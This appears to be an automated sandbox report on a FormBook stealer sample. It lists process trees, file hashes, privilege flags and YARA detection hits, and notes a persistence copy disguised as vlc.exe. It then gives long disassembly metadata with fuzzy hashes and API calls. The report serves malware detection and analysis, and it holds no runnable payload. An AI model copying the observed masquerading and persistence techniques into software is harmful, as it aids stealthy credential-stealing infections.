                                              Path:C:\Users\Public\oftmhayq.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\Public\oftmhayq.exe'
                                              Imagebase:0xfa0000
                                              File size:552960 bytes
                                              MD5 hash:7E26E87AB642008D934824D509559859
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Chronological Activities

                                              Analysis Process: oftmhayq.exe PID: 3708 Parent PID: 4000

                                              General

                                              Start time:11:38:34
                                              Start date:27/11/2020
                                              Path:C:\Users\Public\oftmhayq.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\Public\oftmhayq.exe
                                              Imagebase:0x870000
                                              File size:552960 bytes
                                              MD5 hash:7E26E87AB642008D934824D509559859
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Chronological Activities

                                              Analysis Process: oftmhayq.exe PID: 2344 Parent PID: 5540

                                              General

                                              Start time:11:38:35
                                              Start date:27/11/2020
                                              Path:C:\Users\Public\oftmhayq.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\Public\oftmhayq.exe
                                              Imagebase:0x8a0000
                                              File size:552960 bytes
                                              MD5 hash:7E26E87AB642008D934824D509559859
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Chronological Activities

                                              Analysis Process: explorer.exe PID: 3388 Parent PID: 3708

                                              General

                                              Start time:11:38:37
                                              Start date:27/11/2020
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:
                                              Imagebase:0x7ff714890000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: vlc.exe PID: 3476 Parent PID: 3388

                                              General

                                              Start time:11:38:39
                                              Start date:27/11/2020
                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe'
                                              Imagebase:0x70000
                                              File size:552960 bytes
                                              MD5 hash:7E26E87AB642008D934824D509559859
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low

                                              Chronological Activities

                                              Disassembly

                                              Code Analysis

                                              Reset < >

                                                Analysis Process: powershell.exe PID: 5164 Parent PID: 4940 powershell.exeCOMMON

                                                Executed Functions

                                                Function 00007FFAF0E815A5, Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.446361488.00007FFAF0E80000.00000040.00000001.sdmp, Offset: 00007FFAF0E80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7d136ae24190021218f010f465a32cb6dcd2b253f9b7f790df5ba213fb598ef4
                                                • Instruction ID: 3a98f85368f0ca25ab79906adfc89d7ebb94667b872d6afc4458b55e37ef79ac
                                                • Opcode Fuzzy Hash: 7d136ae24190021218f010f465a32cb6dcd2b253f9b7f790df5ba213fb598ef4
                                                • Instruction Fuzzy Hash: B501A77010CB0C4FD744EF0CE051AA6B3E0FB85320F10056EE58AC3291DB36E881CB45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Analysis Process: powershell.exe PID: 5184 Parent PID: 4940 powershell.exeCOMMON

                                                Executed Functions

                                                Function 00007FFAF0EB3CE7, Relevance: 2.0, Strings: 1, Instructions: 740COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.446888939.00007FFAF0EB0000.00000040.00000001.sdmp, Offset: 00007FFAF0EB0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: m`_H
                                                • API String ID: 0-3858478043
                                                • Opcode ID: dc481bc74b6204669ec285899380fde3b2272ecc060297b44972ec806917081a
                                                • Instruction ID: 37ee81ec1a356ca50f0b755052444178d3ada9e66c92e35766e49e1eaa6eb7fd
                                                • Opcode Fuzzy Hash: dc481bc74b6204669ec285899380fde3b2272ecc060297b44972ec806917081a
                                                • Instruction Fuzzy Hash: FBF1B471A08A498FDB94EF5CC495AA977F1FF69300F14817AD44ED7396CA24EC45CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FFAF0EB2075, Relevance: .6, Instructions: 608COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.446888939.00007FFAF0EB0000.00000040.00000001.sdmp, Offset: 00007FFAF0EB0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 919925560bced310ebceab5c477c04356df1e2f0a44a7b85d49b0ed2af748044
                                                • Instruction ID: 05fff930fac60154ff67b68ad8b46b374c5f7f1583257f9cd48cba0c783b2840
                                                • Opcode Fuzzy Hash: 919925560bced310ebceab5c477c04356df1e2f0a44a7b85d49b0ed2af748044
                                                • Instruction Fuzzy Hash: EAF106B1A0DB864FE759D72CC8A55B53BE0EF57310B0881BFD09DCB2A3E919AC468741
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FFAF0F84687, Relevance: .3, Instructions: 328COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.447125196.00007FFAF0F80000.00000040.00000001.sdmp, Offset: 00007FFAF0F80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6ab76d3b73345fbb8abf2060d01abd064039611b60b2dc18cb1f1fe388c2e44f
                                                • Instruction ID: 6fba8d7ea41cfa72894f3a7f5954ac08e8db6a4ab0d1b9f97c5deeb2a1421996
                                                • Opcode Fuzzy Hash: 6ab76d3b73345fbb8abf2060d01abd064039611b60b2dc18cb1f1fe388c2e44f
                                                • Instruction Fuzzy Hash: 2091287290CA4D1FE795EB2C98495FB7BD1EF96320B0441BFE05DC7293EA14AC168391
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FFAF0EB228C, Relevance: .1, Instructions: 132COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.446888939.00007FFAF0EB0000.00000040.00000001.sdmp, Offset: 00007FFAF0EB0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 79297f2283318b82cec0845d033bfaff7310d126e82ba6aee7f66c2ced5d0396
                                                • Instruction ID: ead3ed91ec183648a0987e851e9679b404066d378c252b80a1bbe80c21ccd557
                                                • Opcode Fuzzy Hash: 79297f2283318b82cec0845d033bfaff7310d126e82ba6aee7f66c2ced5d0396
                                                • Instruction Fuzzy Hash: AC31D57060CB494FEB49DA2CD8559713BE0EF6B35070440AFE48ECB2A3D919AC83C791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FFAF0F86A93, Relevance: .1, Instructions: 63COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.447125196.00007FFAF0F80000.00000040.00000001.sdmp, Offset: 00007FFAF0F80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eb20bef45c7df8a923e3cc836e88b763ee93cc204697721dd9e791458832af6b
                                                • Instruction ID: 4fbb760b1a342c90a035cab7526777b7ca9942746a5eef01383cb18c7e55f5d4
                                                • Opcode Fuzzy Hash: eb20bef45c7df8a923e3cc836e88b763ee93cc204697721dd9e791458832af6b
                                                • Instruction Fuzzy Hash: A3112B71A0C68A0FE759EB6884515E57BD2EF59350B18C0FFC45DDB2D3C9189C158360
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FFAF0F830CC, Relevance: .1, Instructions: 60COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.447125196.00007FFAF0F80000.00000040.00000001.sdmp, Offset: 00007FFAF0F80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d06ce7c363a93e68b36af7a3332e6577b8af0a3639fe5cbca2a84530eb437d70
                                                • Instruction ID: e2fc421673bab9c1eec3d8d029e5d33961fb3fd3db7cae1ff3791e47d58a334d
                                                • Opcode Fuzzy Hash: d06ce7c363a93e68b36af7a3332e6577b8af0a3639fe5cbca2a84530eb437d70
                                                • Instruction Fuzzy Hash: 8F110861A0C6494FEB45EBA889955F9BBD1EF59310B1880BFC15DCB2E3C9189851C360
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FFAF0EB15A5, Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.446888939.00007FFAF0EB0000.00000040.00000001.sdmp, Offset: 00007FFAF0EB0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 330a8d677e5ca5c81559f7f7d67b6ba298c66e662406fd07b4c5cd2d5aac12ea
                                                • Instruction ID: 3b18f34c15fcad941833f3168516b18540b1655a18e7743451d3e303080c40f1
                                                • Opcode Fuzzy Hash: 330a8d677e5ca5c81559f7f7d67b6ba298c66e662406fd07b4c5cd2d5aac12ea
                                                • Instruction Fuzzy Hash: 0801A77010CB0C4FD744EF0CE051AA6B3E0FB85324F50056EE58AC3291DA36E881CB45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FFAF0EB3FC8, Relevance: .0, Instructions: 39COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.446888939.00007FFAF0EB0000.00000040.00000001.sdmp, Offset: 00007FFAF0EB0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 843cb817088174e77322db739917c6581eaface6be50fffd12ee2bd16578b985
                                                • Instruction ID: 65f05d459dc3956e807a21d8b8048bf64e0fae2c80483c936504116b2e1ca6fa
                                                • Opcode Fuzzy Hash: 843cb817088174e77322db739917c6581eaface6be50fffd12ee2bd16578b985
                                                • Instruction Fuzzy Hash: 64F0303275C6058FDB5CAA1CF8429B573E1EB9A321B00457EE48FC2696D927E8428A85
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Analysis Process: oftmhayq.exe PID: 5540 Parent PID: 5164 oftmhayq.exeCOMMON

                                                Executed Functions

                                                Function 071F5D38, Relevance: 20.0, Strings: 15, Instructions: 1235COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: (Uf$(Uf$(Uf$4/Xf$4/Xf$D!Qf$D!Qf$D!Qf$D!Qf$\Pf$\Pf$\Pf$t%Qf$t%Qf$#"
                                                • API String ID: 0-168133937
                                                • Opcode ID: e7645137795640f16567510a282fa208a240c7837737416cc948cb3f7533756a
                                                • Instruction ID: 8a2244b490b0dfdcdf644a2ff45a6b0dceaff8f8a8286a160eb55ee7c501a7ce
                                                • Opcode Fuzzy Hash: e7645137795640f16567510a282fa208a240c7837737416cc948cb3f7533756a
                                                • Instruction Fuzzy Hash: 0BB229B4B002158FCB25DF28C998A69B7F6EF89304F1584A9E54ADB3A1DB30ED41CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0730E050, Relevance: 1.6, Strings: 1, Instructions: 338COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.477012083.0000000007300000.00000040.00000001.sdmp, Offset: 07300000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: <Uf
                                                • API String ID: 0-3474588074
                                                • Opcode ID: e9a9577b12e947ee8ae30c504dcb7db4e95f761e4930752601dff28ed083c3f5
                                                • Instruction ID: f153becaf3a0141c050badde0b341789d19d38df1307e28b89a2210bf172a877
                                                • Opcode Fuzzy Hash: e9a9577b12e947ee8ae30c504dcb7db4e95f761e4930752601dff28ed083c3f5
                                                • Instruction Fuzzy Hash: 7ED191B0E00209CFDB14DFA8C494AAEFBF5FF48314F14855AE419AB291DB34A946CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071F2920, Relevance: .6, Instructions: 638COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 113ba1b290c24a1106b3ae6289b337316b552409448784fc3019ccda4a447b90
                                                • Instruction ID: 67f7d74c7c7ad52c7fd1d6c4e62029e9c5e943bc233e47412313f59185084392
                                                • Opcode Fuzzy Hash: 113ba1b290c24a1106b3ae6289b337316b552409448784fc3019ccda4a447b90
                                                • Instruction Fuzzy Hash: 0E424CB0710245CFDB19DF64C494AAEBBF2BF89300F1584A9E5469B391DB74ED41CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 05BBD4B8, Relevance: .6, Instructions: 629COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.472191039.0000000005BB0000.00000040.00000001.sdmp, Offset: 05BB0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 26ac9bb6f398c74a85e55d76832e62adf2441fac625249bde3df444e7c689e7b
                                                • Instruction ID: 2643a89b32349972cb7345f236c1211f10bb4ec97ea199e2cc4187d80e58cb90
                                                • Opcode Fuzzy Hash: 26ac9bb6f398c74a85e55d76832e62adf2441fac625249bde3df444e7c689e7b
                                                • Instruction Fuzzy Hash: E2423771A05305CFEB249F25C598BBABBB2FF88315F1484A9E4468B650DBF9F841CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 05BB1290, Relevance: .5, Instructions: 545COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.472191039.0000000005BB0000.00000040.00000001.sdmp, Offset: 05BB0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e008ed276fbc48c77170936908f63cd8ad33514d6392944d5e65ab215175b618
                                                • Instruction ID: b33df3f4f4d9b8d86cccf0d3305230519bd08e67ed3ca56ca479dd6fba777261
                                                • Opcode Fuzzy Hash: e008ed276fbc48c77170936908f63cd8ad33514d6392944d5e65ab215175b618
                                                • Instruction Fuzzy Hash: 4422D371A002099FDB11CF68D854AEEBBF6FF88300F1585A9E505EB291DBB0ED45CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071F21B0, Relevance: .5, Instructions: 454COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6d8e359b2c413133e87c72c8ee86939c665a6baa0ca52028a8dff42a47c5792b
                                                • Instruction ID: 8cc4b1443c6c6d75ea5036f72473a46ae30d7e901bc07dd165cadc338229f9f7
                                                • Opcode Fuzzy Hash: 6d8e359b2c413133e87c72c8ee86939c665a6baa0ca52028a8dff42a47c5792b
                                                • Instruction Fuzzy Hash: 57124AB5A002458FC705DF69C584AAEBBF2FF88310B55C499E549EB362DB30ED45CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071F0040, Relevance: .4, Instructions: 403COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9d5e10344b6087df34a075265c4c22cbd55b548d66edaddf9559ec73e32c732b
                                                • Instruction ID: e416f9526cdbf769cd709a7af3e7f45e09b0a26ca22a72cdf5271387fe585dcb
                                                • Opcode Fuzzy Hash: 9d5e10344b6087df34a075265c4c22cbd55b548d66edaddf9559ec73e32c732b
                                                • Instruction Fuzzy Hash: AC027CB5A04705CFDB25CF69C584A6EBBF2BF88300F148569E54A9B7A2DB74E841CB10
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 05BBB368, Relevance: .4, Instructions: 401COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.472191039.0000000005BB0000.00000040.00000001.sdmp, Offset: 05BB0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 33005fbb474198a4377b9e58898a81d1af75ec5ef7220a85d4f59066b9db7383
                                                • Instruction ID: f3145842f24dcaeb50cd6b67557869884b6768fcf3fad13032a6574a70f2fbc2
                                                • Opcode Fuzzy Hash: 33005fbb474198a4377b9e58898a81d1af75ec5ef7220a85d4f59066b9db7383
                                                • Instruction Fuzzy Hash: D5F14074A10208CFDB08DFA4C894AADBBF6FF88304F148469E506AB355DBB5ED46CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 073017FA, Relevance: .4, Instructions: 351COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.477012083.0000000007300000.00000040.00000001.sdmp, Offset: 07300000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3fbb6a710bc92c3da46e05f530f0fe0e319fcf02f202cac3dbd8e1f896893cc4
                                                • Instruction ID: b111058573755c9974a668d82165193d072a9bd3061160d2e901408752f8be68
                                                • Opcode Fuzzy Hash: 3fbb6a710bc92c3da46e05f530f0fe0e319fcf02f202cac3dbd8e1f896893cc4
                                                • Instruction Fuzzy Hash: 90C1D9B190428B8FEB118FB8D8547DEBFB1AF4A224F28419BD4489F193D7344459CBE2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0730BCE8, Relevance: .3, Instructions: 281COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.477012083.0000000007300000.00000040.00000001.sdmp, Offset: 07300000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 718afc452e3298d550c0ff9a51657845d526a6bfef124c917398c67e6696b111
                                                • Instruction ID: 9e0c7c2045f29edfb2d5336e331532236e00a55c9b23d20c403588f447c6152f
                                                • Opcode Fuzzy Hash: 718afc452e3298d550c0ff9a51657845d526a6bfef124c917398c67e6696b111
                                                • Instruction Fuzzy Hash: 27B13FB1E10209DFEB10CFA9C8957DEFBF2AF88354F148129D819A7294DB749845CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0730C5B8, Relevance: .3, Instructions: 266COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.477012083.0000000007300000.00000040.00000001.sdmp, Offset: 07300000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ccdd8eeb7b4346de6b8b364632784879dbe70ec19208e9b8b8ead1d2c68f1901
                                                • Instruction ID: 13e4e980c46df7abebd41f43bd0e5ca5a8a1c5e01040327211098b13d62f162c
                                                • Opcode Fuzzy Hash: ccdd8eeb7b4346de6b8b364632784879dbe70ec19208e9b8b8ead1d2c68f1901
                                                • Instruction Fuzzy Hash: 5EB160B0E00209CFEB10CFA9C8A57DDBBF2AF88754F149229D819E7294DB749845CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02A9B681, Relevance: 6.1, APIs: 4, Instructions: 124threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 02A9B6F0
                                                • GetCurrentThread.KERNEL32 ref: 02A9B72D
                                                • GetCurrentProcess.KERNEL32 ref: 02A9B76A
                                                • GetCurrentThreadId.KERNEL32 ref: 02A9B7C3
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.467944771.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 2a2492add43227ef8e48ff6a30afed383b530d87efb5cfb34498fccc48774b52
                                                • Instruction ID: 56837297bd1b89e1cdeab856ab55fdc3a7b601e5e31e990f5903df15a13b71e4
                                                • Opcode Fuzzy Hash: 2a2492add43227ef8e48ff6a30afed383b530d87efb5cfb34498fccc48774b52
                                                • Instruction Fuzzy Hash: 8D5158B4901349CFDB10CFAAD588BDEBBF1BF89318F208959D419A7260C7355848CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02A9B690, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 02A9B6F0
                                                • GetCurrentThread.KERNEL32 ref: 02A9B72D
                                                • GetCurrentProcess.KERNEL32 ref: 02A9B76A
                                                • GetCurrentThreadId.KERNEL32 ref: 02A9B7C3
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.467944771.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 2063b8b0c27b2ee9cbba45d4fa9a099c6677a065c92690d2b3d9b85b6d40668a
                                                • Instruction ID: f344fa4605e0a49051cee5be5ff2f03c520bea4e7ad5412ebfd559fc93a50f87
                                                • Opcode Fuzzy Hash: 2063b8b0c27b2ee9cbba45d4fa9a099c6677a065c92690d2b3d9b85b6d40668a
                                                • Instruction Fuzzy Hash: D45137B4901349CFDB10CFAAD588BDEBBF5BF89318F208959E419A7250CB356844CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071F8200, Relevance: 3.3, Instructions: 3317COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c69bf100280db417fd55629c00c399c20bd35504c150ee66701a1a2bf3201ab6
                                                • Instruction ID: 2526b612372a52f9aeeab2882507fb3ae561b63780ea19d7c4f70cc1acd65aab
                                                • Opcode Fuzzy Hash: c69bf100280db417fd55629c00c399c20bd35504c150ee66701a1a2bf3201ab6
                                                • Instruction Fuzzy Hash: 54635074B412189FEB259B60CC55FEAB6B6EF88705F0040E9E3097B2D1DB721E809F56
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02A99690, Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02A998D6
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.467944771.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: a0cd61a1d927f98b4c77b97f83b5069839010af7a41b42ab331bcd25b76b6a83
                                                • Instruction ID: 4bde08b77cbcd3d61a3b8f0e3f386d928e868865c7f3fe1e11dd8783ebc78cf6
                                                • Opcode Fuzzy Hash: a0cd61a1d927f98b4c77b97f83b5069839010af7a41b42ab331bcd25b76b6a83
                                                • Instruction Fuzzy Hash: 79711270A00B069FDB24DF6AD18479BB7F1BF88304F008A2DD49ADBA50DB35E8458F91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02A9FCEC, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02A9FE0A
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.467944771.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: cb37fc462a2a54cf4e0cb2661b9dfcbe450881e593c5591051a64e47ccc84508
                                                • Instruction ID: 41dc0e8726a8edb79e6837147352fbd46e5620171ac329859ac9d51517206321
                                                • Opcode Fuzzy Hash: cb37fc462a2a54cf4e0cb2661b9dfcbe450881e593c5591051a64e47ccc84508
                                                • Instruction Fuzzy Hash: 0F51CEB1D003099FDF14CFAAC884ADEBBF5BF48314F24852AE819AB250D7759985CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02A9FCF8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02A9FE0A
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.467944771.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: cd0149877f9d89348a229aa793c71f80a52f4ac7d424c916aca055287e513a97
                                                • Instruction ID: e5d171a46c021aee6ac940a6cc78f56d052f0d1c6331b0fd670050af092fa62c
                                                • Opcode Fuzzy Hash: cd0149877f9d89348a229aa793c71f80a52f4ac7d424c916aca055287e513a97
                                                • Instruction Fuzzy Hash: 6B41A0B1D003099FDF14CF9AC884ADEBBF5BF48314F64812AE819AB210D7759945CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02A95355, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 02A95411
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.467944771.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
